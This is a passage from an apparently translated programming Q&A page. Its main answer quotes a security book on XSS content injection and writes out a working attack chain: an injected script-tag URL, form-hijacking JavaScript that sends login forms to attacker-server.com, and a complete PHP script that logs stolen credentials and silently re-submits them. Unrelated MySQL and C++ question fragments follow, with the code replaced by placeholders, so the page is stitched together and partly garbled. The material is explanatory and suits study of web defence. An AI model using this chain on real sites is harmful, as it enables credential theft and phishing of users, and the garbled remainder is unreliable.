XSS attacks, how does it happen?

14

Recently a client has been the victim of XSS attacks. We treat all inputs that we encounter with faults, but I can not understand how malicious javascript code was inserted into the .js files on the server.

How did you change the script via XSS?

    
asked by anonymous 28.03.2014 / 15:27

1 answer

15

The information below has been taken from the Hacking: The Next Generation book.

Content Injection Using Cross-Site Scripting (XSS)

Dumping the entire XSS load into a chain of commands can be confusing and complicated. Most of the time, the attacker will have to perform a complicated load to maximize the impact of the XSS attack. In such situations, the attacker can use external files JavaScript to hold the exploit loads. It does this by injecting a script statement with a src attribute. The src attribute allows the attacker to specify an external JavaScript file to be executed in the context of the domain that hosts the Web application that is vulnerable to XSS. When injecting a script with a src attribute into an XSS code is inserted, attackers often store the external JavaScript file on a web server that they control. A typical injection of an external script file using XSS would look something like this:

http://vulnerable-server.com/login.jsp?parameter="><script%20src="http://attacker-server.com/payload.js"></script>

Whenareferencetoanexternalscriptisinjected,theattackerhastheoptionofstoringtheentireexploitcodeloadintheexternalscriptfile(inthiscase,thefileinhttp://attacker-server.com/payload.js).Inthisexample,theattackerusestheexternalJavaScriptfiletostoretheexploitcodethatscanstheformobjectsoftheloginpageandchangesformactionsothattheuser'scredentialsaretransferredtotheattacker'swebserver.ThefollowingcodeshowsthecontentsoftheexternalJavaScriptfilepayload.js:

for(i=0;i<document.forms.length;i++){varoriginalaction=document.forms[i].action;document.forms[i].action="http://attacker-server.com/cred-thief.php?orig="+originalaction;
}

This code load JavaScript enumerates all FORM objects, writes the original FORM ACTION attribute, and changes the ACTION attribute to point to the attacker's web server. When the victim submits a form using the "Enter" button on the login page that is vulnerable to XSS, their username and password are passed to the cred-thief.php file on the attacker's web server. Once the attacker's web server receives the victim's credentials, it redirects the victim back to the original login page and automatically connects the victim to the application, masking the fact that his username and password have been stolen. See the code for cred-thief.php :

<?php
// Is the orig parameter present?
if (isset($_GET['orig'])):

    // open the file for storing the stolen creds
    $fp = fopen("StolenCreds.txt", 'a');
    fwrite($fp, $_GET['orig']);

    // Create the initial HTML for the FORM with the
    // original URL for the ACTION
    echo "<html><body><form name='redirect' id='redirect'";
    echo " action='" . $_GET['orig'] . "' method='POST'>";

    // Loop through all the POST parameters stolen from the
    // original site and generate the correct form
    // elements and log the value to a text file
    foreach ($_POST as $var => $value) {
        echo "<input type='hidden' name='" . $var ."' value='" . $value ."'>";

        fwrite($fp,"var:".$var."  value:".$value."\r\n");

    }

    //complete the form and autosubmit the form using javascript
    echo "</form><script>document.redirect.submit()</script></body></html>";

else:
    //If orig is missing, redirect to back to the referring site
    header( 'Location: '. $HTTP_REFERER) ;

endif;

fclose($fp);
?>

XSS vulnerabilities in login pages can be devastating. For example, if a bank site has an XSS exposure anywhere in your domain, a sophisticated phisher will be able to use the XSS vulnerability to take advantage of SSL (including Extended Validation SSL) and filters of phishing . Such phishing pages will display all legitimate SSL certificates and are undetectable by phishing filters, even though they contain phishing code . By using an XSS attack, as shown earlier, the potential phisher can steal the credentials provided to banking sites by circumventing all current phishing protection mechanisms.

I hope this text clarifies some procedures, for more information I recommend reading the entire chapter 2 of the book.

    
28.03.2014 / 16:11
___ ___ erkimt Error in MySQL "expects parameter 1 to be resource, boolean given in" ______ qstntxt ___
%pre%

I have this code and can not see error in it, but it gives me this error. I know there should already be a topic of this on the site but I have tried all the ways and nothing. Give me the bool error (false)

    
______ azszpr28190 ___

This error happens when %code% or %code% fails, it is usually a syntax error in the sql query and returns a %code% as explained in manual . For mysql_fetch _ * () to function properly you must pass a variable of type %code% or %code% which is the return of %code% / %code% on success.

To fix the error you can force mysql_ * mysqli _ mysqli _ to display the database error with the mysql_error () or mysqli_error ()

Version with old mysql functions _ *

%pre%

Version with mysqli_ * procedural

%pre%

Version with mysqli_ * OO

%pre%

The query will return this error because %code% is a reserved mysql word.

  

Error Code: 1064. You have an error in your SQL syntax; check the   manual that corresponds to your MySQL server version for the right   syntax to use near 'desc'

The other way is to print the query and test directly at the database:

%pre%

Related:

Why should not we use functions of type mysql_ *?

MySQL vs PDO - which is the most recommended for to use?

How to print the SQL statement being sent to the bank?

    
______ azszpr333477 ___

The problem occurs because the %code% method needs a parameter with the connection to the database.

I leave an example below. Remember to modify the data to connect to the bank.

I leave it as a hint for you to study using the PDO because it is safer and the %code% is already depreciated.

  

Example:

%pre%     
___ What is the use of "= delete" in the declaration of a C ++ constructor?